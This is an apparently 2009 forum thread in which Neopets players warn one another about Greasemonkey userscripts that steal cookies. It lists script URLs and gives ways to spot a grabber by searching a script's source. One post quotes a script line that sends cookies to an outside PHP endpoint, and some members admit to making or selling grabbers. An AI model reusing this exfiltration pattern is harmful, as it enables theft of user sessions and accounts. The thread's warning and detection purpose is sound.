Ahem. I accidently just downloaded a GM script, ran it, and it ends up it was a cookie grabber. I just lost 3 accounts. Because of this, I'm making a guide of what NOT to download so you don't get scr*wed by cookie grabbers.
The following are Cookie Grabbers that you should NOT (and never should) download.
    Format is:
    URL - Name of script

    http://userscripts.org/scripts/show/47700 - Neopets Acid AutoBuyer
    http://userscripts.org/scripts/show/44326 - Neopets AutoQuester
http://userscripts.org/scripts/show/44325 - Neopets Main Shop Auto Buyer
    http://userscripts.org/scripts/show/43802 - Neopets: Dailys to-do
http://userscripts.org/scripts/show/43330 - Neopets FireFox Auto Buyer (Exclusive!)
    http://userscripts.org/scripts/show/43218 - Firefox Autobuyer v5 -- Neopets Aber!
    http://userscripts.org/scripts/show/43208 - Firefox Autobuyer v2. Neopets FFAB
http://userscripts.org/scripts/show/42985 - Neopets Lightning Fast Autobuyer
    http://userscripts.org/scripts/discuss/42984 - Carnival Games Player + Logger
http://userscripts.org/scripts/show/44958 - Neopets Improvements (Added to this guide on 3/24/09)
http://userscripts.org/scripts/review/43218 - Fire Fox Auto Buyer New Edition
    http://userscripts.org/scripts/show/46323 - Neopets AutoBuyer Ultimate v3
http://userscripts.org/scripts/show/43330 -Neopets FireFox Autobuyer v4 (EXCLUSIVE)!
    http://userscripts.org/scripts/show/47449- Neopets: Kadoatie Feeder
I will try to update this as much as possible.
Thanks for reading, and have a merry safe hacking!

I thought searching for a cookie grabber within a script was pretty easy :/

You just go to view source, then ctrl + f and type in cookie. If anything turns up, it's a cookie grabber :/

Unless the script is FOR cookies, however very few are...
Yes, it is easy to see if it's a cookie grabber or not, this guide is just to save time.

It would be nice if you knew which ones were cookie grabbers and which weren't. The first one ISN'T.

It's extremely easy to search for the string 'cookie' in the source and then most of those scripts listed obviously don't do anything close to what they advertise. So far I haven't seen a script that needs to use your cookies.

You have an autobuyer listed that has the cookie grabber as the second line. Remove that and you have yourself a free autobuyer (it looks like it's the one ricky is advertising) Well you need to edit the script a little or manually adjust the GM values in about:config

    Thanks for the help. +Rep
    However,
    Code (Text):
    1. var strURL = 'http://neopetscg.freehostia.com/cookie.php?cookie=';
was in the second one, it's a cookie grabber.
And for the 1st one, sorry, I posted the wrong URL. Edited. :)
I have seen scripts that use your cookies, just not for neopets.

You can't determine if it's a cookie grabber by just searching 'cookie'. Three of these are my scripts, and im pretty sure i encoded one to a hash so the word cookie won't be in it.

Go figure that you are the one who's been making these cookie grabbers? xD Are they easy to make because I might just start making them myself.
Most cookie grabbers have the word cookie in it, and all of those scripts that I posted have cookie grabbers in them.
    That's kinda ironic...
    PS: Nice new signature picture

    Fine then... also search for

    \x63\x6f\x6f\x6b\x69\x65

which is cookie. But if the source is encoded, that's another reason to watch out because people don't encode the source unless they'retrying to hide something.

I usually also search for http and see what other sites it's trying to access.

But I thank you for providing the autobuyer free of charge.

Rider you are just trying to protect the scripts that you made. You can Cookie Grab others, but don't do it on neofriends. All of the scripts I posted in this guide DO have cookie grabbers on them.

Oops lol misread? xD Sorry lol I slept in today and I haven't woken up yet xD.
I'm just pointing out that you have a bias because you are selling things like Cookie Grabbers.

    Yes Rider.
People who create something or are in the same league as someone else, who generally support them by selling things to them, don't want them to get in trouble or loose their business. You quite clearly have a bias if you sell things like FLP or CGers.
